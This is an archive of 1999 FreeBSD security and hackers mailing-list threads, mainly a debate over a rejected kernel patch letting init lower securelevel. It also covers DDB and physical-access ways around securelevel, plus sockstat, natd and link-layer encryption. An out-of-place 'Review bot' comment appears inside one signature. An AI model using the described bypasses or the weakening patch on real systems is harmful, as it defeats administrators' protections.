:
:That would be 0xdeadc0de, but it wasn't actually 0x1234. It was something
:else somewhat similar. After tracking down the problem k6_mem.c has, I may
:look much more into this.
:
: Brian Fundakowski Feldman / "Any sufficiently advanced bug is \

    I'm trying to remember where that came from... grep grep grep. Ah,
    here we are. 0x12342378 is used by the zone allocator to indicate a
    free entry. It stores it in a particular place (it isn't a fill).
    (see vm/vm_zone.h)

-Matt
Matthew Dillon

From: Matthew Dillon
Date: Sun, 5 Sep 1999 21:18:47 -0700 (PDT)
Message-Id: <199909060418.VAA70623@apollo.backplane.com>
To: Bosko Milekic
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: mbuf shortage situations

: The only reason that I see for which we would actually panic() in
:this situation (as opposed to suffer the packet loss) is if we get to the
:point where we're losing packets because some script kid starts up
:something that will eat up sockbuf space and continuously fork, then we
:would lose all remote access to the machine in question (since all packets
:would be dropped) and we wouldn't really mind a panic() for obvious
:practical reasons.
: In any case, I, personally, would prefer to suffer packet loss as
:opposed to a panic (especially now that Brian is in the process of writing
:diffs that will allow us to limit socket buffer space per UID through
:login.conf!)
: Having MGET store that null (e.g. fail as opposed to panic) on a
:M_WAIT seems fairly easy to fix, and would probably require some patching
:that would ensure that the packet loss is handled relatively 'cleanly'
:(probably some debugging), but I wouldn't mind doing this.
:However, I'd
:like to know if there are objections to doing this or, in fact, if there
:are any suggestions on how to handle mbuf shortage situations (aside from
:just limiting -- although limiting is in itself a good solution and I'm
:glad that Brian F. is working on that).
:
:Cheers,
:Bosko.

    The issue is basically having someone find the time to figure out how
    to gracefully unwind various pieces of network code when an mbuf
    cannot be allocated. Once that is done, the panic can be turned into
    a (rate-limited) printf.

-Matt

From: KATO Takenori
Date: Mon, 06 Sep 1999 13:53:17 +0900
Message-Id: <19990906135317J.kato@gneiss.eps.nagoya-u.ac.jp>
To: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Init(8) cannot decrease securelevel

Once securelevel has been increased, no process can decrease it because the kernel always refuses to decrease it. This is inconsistent with the manual page of init:

    The kernel runs with four different levels of security.
    Any super-user process can raise the security level, but only init can lower it.

Is there any security problem in implementing this? If not, could someone review the following patch?

kato

---------- BEGIN ----------
*** kern_mib.c.ORIG Mon Sep 6 13:46:40 1999 --- kern_mib.c Mon Sep 6 13:49:44 1999 *************** *** 178,184 **** error = sysctl_handle_int(oidp, &level, 0, req); if (error || !req->newptr) return (error); ! if (level < securelevel) return (EPERM); securelevel = level; return (error); --- 178,184 ---- error = sysctl_handle_int(oidp, &level, 0, req); if (error || !req->newptr) return (error); ! if (level < securelevel && req->p->p_pid != 1) return (EPERM); securelevel = level; return (error);
---------- END ----------

-----------------------------------------------+--------------------------+
KATO Takenori                                  | FreeBSD                  |
Dept. Earth Planet. Sci, Nagoya Univ.          | The power to serve!      |
Nagoya, 464-8602, Japan                        | http://www.FreeBSD.org/  |
++++ FreeBSD(98) 3.2: Rev. 01 available!       |http://www.jp.FreeBSD.org/|
++++ FreeBSD(98) 2.2.8: Rev. 02 available!
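Review bot: the relaxed test `if (level < securelevel && req->p->p_pid != 1)` in the new hunk lets any request coming from PID 1 lower securelevel to any value, with no lower bound and nothing logged, so a drop would be silent. That re-opens the path rev.1.9 closed on purpose (its log, quoted in Bruce Evans' reply below, says lowering "does nothing good except of opening a can of (potential or real) security holes" and that console operators can reboot instead), so the submission should either explain why that reasoning no longer holds or, as is proposed later in the thread, correct the init(8) manual page instead of the kernel; if the kernel path is kept, at least printf the old and new level so the transition is visible.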
                                               +==========================+

From: Bruce Evans
Date: Mon, 6 Sep 1999 15:13:48 +1000
Message-Id: <199909060513.PAA12402@godzilla.zeta.org.au>
To: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, kato@ganko.eps.nagoya-u.ac.jp
Subject: Re: Init(8) cannot decrease securelevel

>Once securelevel has been increased, no process can decrease it because
>kernel always refuse decreasing it. This is inconsistent with the
>manual page of init:
>
> The kernel runs with four different levels of security. Any super-user
> process can raise the security level, but only init can lower it.
>
>Is there any security problem to implement this? If no, could someone
>review following patch?

The patch just backs out rev.1.9:

RCS file: /home/ncvs/src/sys/kern/kern_mib.c,v
Working file: kern_mib.c
head: 1.25
...
----------------------------
revision 1.9
date: 1997/06/25 07:31:47;  author: joerg;  state: Exp;  lines: +2 -2
Don't ever allow lowering the securelevel at all. Allowing it does
nothing good except of opening a can of (potential or real) security
holes. People maintaining a machine with higher security requirements
need to be on the console anyway, so there's no point in not forcing
them to reboot before starting maintenance.

Agreed by: hackers, guido
----------------------------

There used to be security holes that allowed root to lower `securelevel' using init.
Rev.1.9 defends against any undiscovered holes.

Bruce

From: KATO Takenori
Date: Mon, 06 Sep 1999 14:23:42 +0900
Message-Id: <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp>
In-Reply-To: <199909060513.PAA12402@godzilla.zeta.org.au>
To: bde@zeta.org.au
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

Bruce Evans wrote:

> There used to be security holes that allowed root to lower `securelevel'
> using init. Rev.1.9 defends against any undiscovered holes.

How about the following change?

----------
*** init.8.ORIG Mon Sep 6 14:20:46 1999 --- init.8 Mon Sep 6 14:23:01 1999 *************** *** 92,99 **** .Dq secure . .Pp The kernel runs with four different levels of security. ! Any super-user process can raise the security level, but only ! .Nm can lower it. The security levels are: .Bl -tag -width flag --- 92,98 ---- .Dq secure .
.Pp The kernel runs with four different levels of security. ! Any super-user process can raise the security level, but no process can lower it. The security levels are: .Bl -tag -width flag
----------

-----------------------------------------------+--------------------------+
KATO Takenori                                  | FreeBSD                  |
Dept. Earth Planet. Sci, Nagoya Univ.          | The power to serve!      |
Nagoya, 464-8602, Japan                        | http://www.FreeBSD.org/  |
++++ FreeBSD(98) 3.2: Rev. 01 available!       |http://www.jp.FreeBSD.org/|
++++ FreeBSD(98) 2.2.8: Rev. 02 available!     +==========================+

From: Bruce Evans
Date: Mon, 6 Sep 1999 15:26:06 +1000
Message-Id: <199909060526.PAA13689@godzilla.zeta.org.au>
To: bde@zeta.org.au, kato@ganko.eps.nagoya-u.ac.jp
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

>> There used to be security holes that allowed root to lower `securelevel'
>> using init. Rev.1.9 defends against any undiscovered holes.
>
>How about following change?

OK.
Bruce

From: Dag-Erling Smorgrav
Date: 06 Sep 1999 11:13:48 +0200
In-Reply-To: KATO Takenori's message of "Mon, 06 Sep 1999 14:23:42 +0900"
To: KATO Takenori
Cc: bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

KATO Takenori writes:

> The kernel runs with four different levels of security.
> ! Any super-user process can raise the security level, but no process
> can lower it.

How about "The security level can only be raised by the super-user, and cannot be lowered by anyone." instead?
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From: Sheldon Hearn
Date: Mon, 06 Sep 1999 13:38:28 +0200
Message-ID: <28018.936617908@axl.noc.iafrica.com>
In-Reply-To: <36622.936445305@verdi.nethelp.no>
To: sthaug@nethelp.no
Cc: madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD

On Sat, 04 Sep 1999 13:41:45 +0200, sthaug@nethelp.no wrote:

> You're probably using ssh with X11 forwarding. If you use the
> 'sockstat' program you'll find that sshd is listening to those ports.

This is the third time I've seen someone try to use netstat to figure out who's listening to what. Do you think an xref to sockstat would be completely inappropriate in the netstat(1) manpage?

Ciao,
Sheldon.
From: sthaug@nethelp.no
Date: Mon, 06 Sep 1999 13:47:33 +0200
Message-ID: <75796.936618453@verdi.nethelp.no>
In-Reply-To: <28018.936617908@axl.noc.iafrica.com>
To: sheldonh@uunet.co.za
Cc: madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD

> This is the third time I've seen someone try to use netstat to figure
> out who's listening to what. Do you think an xref to sockstat would be
> completely inappropriate in the netstat(1) manpage?

For those versions of FreeBSD where sockstat is installed by default (at least 3.2-STABLE and newer), I think a reference to sockstat would be an excellent idea.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From: Dag-Erling Smorgrav
Date: 06 Sep 1999 15:14:40 +0200
In-Reply-To: sthaug@nethelp.no's message of "Mon, 06 Sep 1999 13:47:33 +0200"
To: sthaug@nethelp.no
Cc: sheldonh@uunet.co.za, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG
Subject: Re: Tracing open ports on FreeBSD

sthaug@nethelp.no writes:

> > This is the third time I've seen someone try to use netstat to figure
> > out who's listening to what. Do you think an xref to sockstat would be
> > completely inappropriate in the netstat(1) manpage?
> For those versions of FreeBSD where sockstat is installed by default
> (at least 3.2-STABLE and newer), I think a reference to sockstat would
> be an excellent idea.

Look ma, I wrote something *useful*!
*grin*

DES (author of sockstat)
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From: Matthew Dillon
Date: Mon, 6 Sep 1999 08:39:54 -0700 (PDT)
Message-Id: <199909061539.IAA74893@apollo.backplane.com>
To: Dag-Erling Smorgrav
Cc: KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

:
:KATO Takenori writes:
:> The kernel runs with four different levels of security.
:> ! Any super-user process can raise the security level, but no process
:> can lower it.
:
:How about "The security level can only be raised by the super-user,
:and cannot be lowered by anyone." instead?
:
:DES
:--
:Dag-Erling Smorgrav - des@flood.ping.uio.no

    Though, as a side note, it should be noted that if you have DDB
    enabled then lowering the secure level is pretty easy to do. If you
    have access to the console, of course. We used this trick at BEST
    a couple of times. Still, I think this might qualify as a bug in
    the securelevel implementation.
-Matt
Matthew Dillon

From: "Matthew D. Fuller"
Date: Mon, 6 Sep 1999 14:12:32 -0500
Message-ID: <19990906141231.L18814@futuresouth.com>
In-Reply-To: <199909061539.IAA74893@apollo.backplane.com>
To: Matthew Dillon
Cc: Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

On Mon, Sep 06, 1999 at 08:39:54AM -0700, a little birdie told me
that Matthew Dillon remarked
>
> Though, as a side note, it should be noted that if you have DDB
> enabled then lowering the secure level is pretty easy to do. If you
> have access to the console, of course. We used this trick at BEST
> a couple of times. Still, I think this might qualify as a bug in
> the securelevel implementation.

I don't know about 'bug in securelevel implementation'...
For DDB to be DDB, you have to be able to tweak the running kernel any which way outside of its control. For securelevel to be securelevel, you have to prevent changes to X, Y, and Z, no matter how they're changed.
I think it's more of a 'DDB is antithetical to securelevel'. Calling it a bug in securelevel is like calling lack of cargo space a bug in a Geo Metro.

--
Matthew Fuller (MF4839)     | fullermd@over-yonder.net
Unix Systems Administrator  | fullermd@futuresouth.com
Specializing in FreeBSD     | http://www.over-yonder.net/
FutureSouth Communications  | ISPHelp ISP Consulting
"The only reason I'm burning my candle at both ends, is because I haven't
figured out how to light the middle yet"

From: Matthew Dillon
Date: Mon, 6 Sep 1999 13:29:44 -0700 (PDT)
Message-Id: <199909062029.NAA76229@apollo.backplane.com>
To: "Matthew D. Fuller"
Cc: Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

:On Mon, Sep 06, 1999 at 08:39:54AM -0700, a little birdie told me
:that Matthew Dillon remarked
:>
:> Though, as a side note, it should be noted that if you have DDB
:> enabled then lowering the secure level is pretty easy to do. If you
:> have access to the console, of course. We used this trick at BEST
:> a couple of times.
:> Still, I think this might qualify as a bug in
:> the securelevel implementation.
:
:I don't know about 'bug in securelevel implementation'...
:For DDB to be DDB, you have to be able to tweak the running kernel any
:which way outside of its control. For securelevel to be securelevel, you
:have to prevent changes to X, Y, and Z, no matter how they're changed.
:
:I think it's more of a 'DDB is antithetical to securelevel'. Calling it a
:bug in securelevel is like calling lack of cargo space a bug in a Geo
:Metro.
:
:Matthew Fuller (MF4839) | fullermd@over-yonder.net

    Well, if you are using DDB for kernel debugging via remote gdb, that
    is so. In the production installation at BEST we leave DDB turned on
    in order to be able to track panics and control dumps. We do not use
    it for remote gdb debugging.

    I think the vast majority of production installations which use DDB
    only need the trace, show, and panic capability. They probably do not
    need to issue writes into kernel memory. In these installations DDB
    is necessary to deal with system panics, so turning it off is not
    really an option. So making DDB 'secure-level friendly' would be a
    useful thing to do, I think.

    The idea is not to disable DDB, but to simply limit the actions that
    can be performed within it if the securelevel has been raised. The
    sysadmin would only be allowed to issue passive commands, cont, and
    'panic'. The sysadmin would not be allowed to modify the running
    system. A hacker in a similar situation would not be able to do
    anything beyond crash the machine. I would rather a machine crash
    than give a hacker the ability to defeat the security mechanism in
    order to gain access to the system and modify data.
-Matt

From: Greg Black
Date: Tue, 07 Sep 1999 06:49:29 +1000
Message-ID: <19990906204930.14319.qmail@alice.gba.oz.au>
In-Reply-To: <199909061539.IAA74893@apollo.backplane.com>
To: Matthew Dillon
Cc: Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

Matthew Dillon writes:

> Though, as a side note, it should be noted that if you have DDB
> enabled then lowering the secure level is pretty easy to do. If you
> have access to the console, of course.

It should also be noted that it makes no sense to enable DDB on systems that need to use elevated securelevels.
--
Greg Black --

From: KATO Takenori
Date: Tue, 07 Sep 1999 10:21:53 +0900
Message-Id: <19990907102153R.kato@gneiss.eps.nagoya-u.ac.jp>
In-Reply-To: <199909061539.IAA74893@apollo.backplane.com>
To: dillon@apollo.backplane.com
Cc: des@flood.ping.uio.no, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

Matthew Dillon wrote:

> Though, as a side note, it should be noted that if you have DDB
> enabled then lowering the secure level is pretty easy to do. If you
> have access to the console, of course. We used this trick at BEST
> a couple of times. Still, I think this might qualify as a bug in
> the securelevel implementation.

I also think it should be in the manual page. But I don't think it should be called a `bug.'
When an administrator maintains a machine with higher security, he/she must be careful with not only the securelevel but also many other points, and may remove options for kernel hackers.

-----------------------------------------------+--------------------------+
KATO Takenori                                  | FreeBSD                  |
Dept. Earth Planet. Sci, Nagoya Univ.          | The power to serve!      |
Nagoya, 464-8602, Japan                        | http://www.FreeBSD.org/  |
++++ FreeBSD(98) 3.2: Rev. 01 available!       |http://www.jp.FreeBSD.org/|
++++ FreeBSD(98) 2.2.8: Rev. 02 available!     +==========================+

From: "Bryan Smith (Administrator)"
Date: Mon, 6 Sep 1999 23:10:15 -0500 (CDT)
In-Reply-To: <1447.990905@cityline.ru>
To: "Dmitriy V. Bokiy"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: newbie: natd

Deny everything that you do not have explicitly allowed in. If your kernel config is still set to default deny, then it's every address coming in regardless of ipfw rules. If you want some addresses allowed in, enter those rules with ipfw before any rule denying incoming packets.

Bryan Smith

The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him, not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.
                                    -- Sun-Tzu, The Art of Warfare

On Sun, 5 Sep 1999, Dmitriy V. Bokiy wrote:

> From natd(8):
>
>    "-deny_incoming | -d
>          Reject packets destined for the current IP number that have
>          no entry in the internal translation table."
>
> My question is what packets are affected by this option? Packets with public
> addresses (I mean this scheme: Internet-->router(ipfw+NAT)-->subnet1(public addresses)->
> ->router(ipfw)-->subnet2(reserved addresses))?
>
> --Dmitriy
>
> P.S. Sorry, if it's a dull question.

From: Matthew Dillon
Date: Mon, 6 Sep 1999 21:20:55 -0700 (PDT)
Message-Id: <199909070420.VAA77483@apollo.backplane.com>
To: Greg Black
Cc: Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel

:> Though, as a side note, it should be noted that if you have DDB
:> enabled then lowering the secure level is pretty easy to do. If you
:> have access to the console, of course.
:
:It should also be noted that it makes no sense to enable DDB on
:systems that need to use elevated securelevels.
:
:--
:Greg Black

    I disagree quite strongly. DDB provides a mechanism to allow a sysadmin to obtain a greater amount of information from a panic situation than he could get otherwise. Being able to obtain this information does not run counter to running with a raised securelevel.

    If the system winds up in a state where a kernel core cannot be generated, DDB is the only way to figure out what is going on. securelevel is a mechanism which attempts to guarantee data security, at least to a degree. These two items do not clash.

                                        -Matt
                                        Matthew Dillon

From owner-freebsd-security Mon Sep  6 21:39:52 1999
From: dmp@aracnet.com
Date: Mon, 06 Sep 1999 21:37:57 -0700
Message-ID: <37D496A5.A0576E0F@aracnet.com>
To: freebsd-security@freebsd.org
Subject: Layer 2 ethernet encryption?

My apologies if this shouldn't be posted to this group, but I didn't know of any other place where an open discussion among "friends" could take place. If I should take this elsewhere, just let me know.

Is it possible to encrypt ethernet packets so that all layers above layer 2 would be encrypted?
The idea I had was to make a device that could defeat a TCP sniffer by encrypting the IP headers. Is this doable? Viable? A reinvention of the wheel?

From owner-freebsd-security Mon Sep  6 21:50:47 1999
From: "Bryan Smith (Administrator)"
Date: Mon, 6 Sep 1999 23:51:10 -0500 (CDT)
To: dmp@aracnet.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <37D496A5.A0576E0F@aracnet.com>

Where would you implement this on the system?

I just use SSH.

Bryan Smith

The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him, not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.
    -- Sun-Tzu, The Art of Warfare

On Mon, 6 Sep 1999 dmp@aracnet.com wrote:

> My apologies if this shouldn't be posted to this group, but I didn't
> know of any other place where an open discussion among "friends"
> could take place. If I should take this elsewhere, just let me know.
>
> Is it possible to encrypt ethernet packets so that all layers above
> layer 2 would be encrypted? The idea I had was to make a device that
> could defeat a TCP sniffer by encrypting the IP headers. Is this
> doable? Viable? A reinvention of the wheel?
From owner-freebsd-security Mon Sep  6 22:06:09 1999
From: KATO Takenori
Date: Tue, 07 Sep 1999 14:00:16 +0900
Message-Id: <19990907140016E.kato@gneiss.eps.nagoya-u.ac.jp>
To: dillon@apollo.backplane.com
Cc: gjb-freebsd@gba.oz.au, des@flood.ping.uio.no, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
In-Reply-To: Your message of "Mon, 6 Sep 1999 21:20:55 -0700 (PDT)" <199909070420.VAA77483@apollo.backplane.com>
References: <199909070420.VAA77483@apollo.backplane.com>

Matthew Dillon wrote:

> I disagree quite strongly. DDB provides a mechanism to allow a
> sysadmin to obtain a greater amount of information from a panic
> situation than he could get otherwise. Being able to obtain this
> information does not run counter to running with a raised securelevel.
>
> If the system winds up in a state where a kernel core cannot be
> generated, DDB is the only way to figure out what is going on.
> securelevel is a mechanism which attempts to guarantee data security,
> at least to a degree. These two items do not clash.

If the console works and crackers can use it, protecting securelevel from DDB does not provide enough security. Though securelevel cannot be changed,

  (1) Turn off power.
  (2) Boot as single-user mode.
  (3) Do what crackers want.

or

  (1) Turn off power.
  (2) Remove HDD.
  (3) Mount on another FreeBSD box.
  (4) Edit a file in the HDD.
  (5) Return HDD.
  (6) Reboot.

is available.

-----------------------------------------------+--------------------------+
 KATO Takenori                                 | FreeBSD                  |
 Dept. Earth Planet. Sci, Nagoya Univ.         | The power to serve!      |
 Nagoya, 464-8602, Japan                       | http://www.FreeBSD.org/  |
 ++++ FreeBSD(98) 3.2: Rev. 01 available!      |http://www.jp.FreeBSD.org/|
 ++++ FreeBSD(98) 2.2.8: Rev. 02 available!    +==========================+

From owner-freebsd-security Mon Sep  6 22:06:59 1999
From: Peter Jeremy
Date: Tue, 7 Sep 1999 15:06:02 +1000
Message-Id: <99Sep7.150409est.40326@border.alcanet.com.au>
To: dillon@apollo.backplane.com
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
In-reply-to: <199909070420.VAA77483@apollo.backplane.com>

Matthew Dillon wrote:

> If the system winds up in a state where a kernel core cannot be
> generated, DDB is the only way to
> figure out what is going on.
> securelevel is a mechanism which attempts to guarantee data security,
> at least to a degree.

The problem is that DDB currently allows too much freedom. It needs to disable various commands as the securelevel is raised. Working out which commands is the non-trivial exercise - especially since you can add new ones with DB_COMMAND().

Peter

From owner-freebsd-security Mon Sep  6 22:11:22 1999
From: Christian Kuhtz
Date: Tue, 7 Sep 1999 01:08:27 -0400
Message-ID: <19990907010827.A124@ns1.adsu.bellsouth.com>
To: "Bryan Smith (Administrator)"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
References: <37D496A5.A0576E0F@aracnet.com>
In-Reply-To: ; from Bryan Smith (Administrator) on Mon, Sep 06, 1999 at 11:51:10PM -0500

Err, there are some things that don't run easily over SSH.

You could approach this at least four ways (that I can think of):

a) write a device driver layer which inserts link layer encryption and crypto management functions.
   - you'd need to do this with each box and device driver you want to be able to communicate with each other -- very cumbersome, IMHO, and a bad idea unless you got a damn good reason to do so.

b) use IPv4 IPSec -- pain in the a** after all the junk we had to deal with in my professional life. Lots and lots of interop issues.
c) use IPv6 IPSec -- learning curve to properly run IPv6 may be a bit high, but the rest is pretty straightforward and IMHO more clean than IPv4 IPSec, particularly IPSec host-mode.

d) use SSL style application layer encryption. -- by far the most portable implementation.

It'd help if you could describe a little more of what exactly you're trying to do.. Ask yourself who you mistrust and who you trust in your application. That's usually the best way to approach encryption, unless you are a marketing moron^H^H^H^H^Hgenius.

Cheers,
Chris

On Mon, Sep 06, 1999 at 11:51:10PM -0500, Bryan Smith (Administrator) wrote:
> where would you implement this on the system?
>
> I just use SSH.
>
> Bryan Smith
[.. huge sig clipped ..]

--
Christian Kuhtz, Sr. Network Architect                 BellSouth Corporation
-wk, -hm                                              Advanced Data Services
"Affiliation given for identification, not representation."  Atlanta, GA, U.S.

From owner-freebsd-security Mon Sep  6 22:33:15 1999
To: dmp@aracnet.com
Cc: freebsd-security@freebsd.org
From: "Gary Palmer"
Subject: Re: Layer 2 ethernet encryption?
In-reply-to: Your message of "Mon, 06 Sep 1999 21:37:57 PDT."
             <37D496A5.A0576E0F@aracnet.com>
Date: Tue, 07 Sep 1999 01:32:58 -0400
Message-ID: <39480.936682378@noop.colo.erols.net>

dmp@aracnet.com wrote in message ID <37D496A5.A0576E0F@aracnet.com>:

> Is it possible to encrypt ethernet packets so that all layers above
> layer 2 would be encrypted? The idea I had was to make a device that
> could defeat a TCP sniffer by encrypting the IP headers. Is this
> doable? Viable? A reinvention of the wheel?

How would you route the traffic? No routers would be able to pass the traffic.

If you are doing this for a local LAN, I suggest you have bigger problems :)

From owner-freebsd-security Mon Sep  6 22:39:21 1999
In-Reply-To: <37D496A5.A0576E0F@aracnet.com>
Date: Tue, 07 Sep 1999 09:41:21 +0400 (MSD)
Reply-To: ks@itp.ac.ru
Organization: OSI AF, Moscow office
From: "Sergey S. Kosyakov"
To: dmp@aracnet.com
Subject: RE: Layer 2 ethernet encryption?
Cc: freebsd-security@freebsd.org

On 07-Sep-99 dmp@aracnet.com wrote:
> Is it possible to encrypt ethernet packets so that all layers above
> layer 2 would be encrypted? The idea I had was to make a device that
> could defeat a TCP sniffer by encrypting the IP headers. Is this
> doable? Viable? A reinvention of the wheel?
>

You can establish a secure tunnel with TUND - over tun(4) pseudo-devices if you use routing, or over divert(4) sockets with ipfw(8) rules for LAN.

---
----------------------------------
E-Mail: Sergey S. Kosyakov
Date: 07-Sep-99
Time: 09:39:12
----------------------------------

From owner-freebsd-security Mon Sep  6 22:40:15 1999
From: David Scheidt
Date: Tue, 7 Sep 1999 00:40:03 -0500 (CDT)
To: KATO Takenori
Cc: dillon@apollo.backplane.com, gjb-freebsd@gba.oz.au, des@flood.ping.uio.no, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
In-Reply-To: <19990907140016E.kato@gneiss.eps.nagoya-u.ac.jp>

On Tue, 7 Sep 1999, KATO Takenori wrote:

> DDB does not provide enough security. Though securelevel cannot be
> changed,
>
> (1) Turn off power.
> (2) Boot as single-user mode.

Setting the console as insecure should protect against this.

> or
>
> (1) Turn off power.
> (2) Remove HDD.
> (3) Mount on another FreeBSD box.
> (4) Edit a file in the HDD.
> (5) Return HDD.
> (6) Reboot.
>
> is available.

There isn't a whole lot you can do to protect a system against crackers who have physical access to the system. Heavily armed guards would help, but I don't expect to see them as part of the base distribution anytime soon.

David Scheidt

From owner-freebsd-security Mon Sep  6 22:44:56 1999
From: "Rodney W. Grimes"
Date: Mon, 6 Sep 1999 22:42:32 -0700 (PDT)
Message-Id: <199909070542.WAA04637@gndrsh.dnsmgr.net>
To: gpalmer@FreeBSD.ORG (Gary Palmer)
Cc: dmp@aracnet.com, freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
In-Reply-To: <39480.936682378@noop.colo.erols.net> from Gary Palmer at "Sep 7, 1999 01:32:58 am"

> dmp@aracnet.com wrote in message ID
> <37D496A5.A0576E0F@aracnet.com>:
> > Is it possible to encrypt ethernet packets so that all layers above
> > layer 2 would be encrypted? The idea I had was to make a device that
> > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > doable? Viable? A reinvention of the wheel?
>
> How would you route the traffic?
> No routers would be able to pass the
> traffic.

No, only routers knowing the key would be able to route traffic.

>
> If you are doing this for a local LAN, I suggest you have bigger
> problems :)

Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan and several other wireless cards do DES encryption at layer 1... so it _can_ be done. And more importantly is being done (first hand knowledge on that one).

See one ``bigger problem''? Without DES on our wireless network any old joe with a wavelan card could come along, sniff for a while, find an open IP and jump right on into our network. Though many other safeguards would make his life a fair bit harder than this, until we implemented DES at layer 1 we had a problem.... I could care less about them being able to see the data, but being able to join the network was the real problem.

We are facing a similar engineering/security problem on another project that involves wired networks, but I can't get into that one.

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Mon Sep  6 22:47:41 1999
From: dmp@aracnet.com
Date: Mon, 06 Sep 1999 22:47:12 -0700
Message-ID: <37D4A6E0.F49A6F87@aracnet.com>
To: "Bryan Smith (Administrator)"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Layer 2 ethernet encryption?
"Bryan Smith (Administrator)" wrote:
>
> where would you implement this on the system?

A layer 2 bridge between the NIC and the network.

> I just use SSH.

SSH still requires that unencrypted IP headers be used, allowing a sniffer to see the traffic.

> On Mon, 6 Sep 1999 dmp@aracnet.com wrote:
>
> > My apologies if this shouldn't be posted to this group, but I didn't
> > know of any other place where an open discussion among "friends"
> > could take place. If I should take this elsewhere, just let me know.
> >
> > Is it possible to encrypt ethernet packets so that all layers above
> > layer 2 would be encrypted? The idea I had was to make a device that
> > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > doable? Viable? A reinvention of the wheel?

From owner-freebsd-security Mon Sep  6 23:06:10 1999
From: dmp@aracnet.com
Date: Mon, 06 Sep 1999 23:05:52 -0700
Message-ID: <37D4AB40.AEE4C2EA@aracnet.com>
To: Gary Palmer
Cc: freebsd-security@freebsd.org
Subject: Re: Layer 2 ethernet encryption?
References: <39480.936682378@noop.colo.erols.net>

Gary Palmer wrote:
>
> dmp@aracnet.com wrote in message ID
> <37D496A5.A0576E0F@aracnet.com>:
> > Is it possible to encrypt ethernet packets so that all layers above
> > layer 2 would be encrypted? The idea I had was to make a device that
> > could defeat a TCP sniffer by encrypting the IP headers. Is this
> > doable? Viable? A reinvention of the wheel?
>
> How would you route the traffic? No routers would be able to pass the
> traffic.

The network in question doesn't use IP-based routing.

> If you are doing this for a local LAN, I suggest you have bigger
> problems :)

You're right, I do have bigger problems. Like deep paranoia among the users of the LAN.

From owner-freebsd-security Mon Sep  6 23:17:59 1999
From: Nick Hibma
Reply-To: Nick Hibma
Date: Tue, 7 Sep 1999 08:13:35 +0200 (MET DST)
To: Matthew Dillon
Cc: Greg Black, Dag-Erling Smorgrav, KATO Takenori, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Init(8) cannot decrease securelevel
In-Reply-To: <199909070420.VAA77483@apollo.backplane.com>

> I disagree quite strongly.
> DDB provides a mechanism to allow a
> sysadmin to obtain a greater amount of information from a panic
> situation than he could get otherwise. Being able to obtain this
> information does not run counter to running with a raised securelevel.
>
> If the system winds up in a state where a kernel core cannot be
> generated, DDB is the only way to figure out what is going on.
> securelevel is a mechanism which attempts to guarantee data security,
> at least to a degree. These two items do not clash.
>

Anyway, as soon as you can physically access the PC, you'd lose anyway, independent of whether you can go into DDB to do things. You can reboot, boot a floppy. Yes you can do something about those things, but only to a limited extent.

Nick

--
ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy

From owner-freebsd-security Mon Sep  6 23:21:42 1999
From: Javier Henderson
Date: Mon, 6 Sep 1999 23:20:00 -0700 (PDT)
Message-ID: <14292.44688.380092.659018@bogon.kjsl.com>
To: dmp@aracnet.com
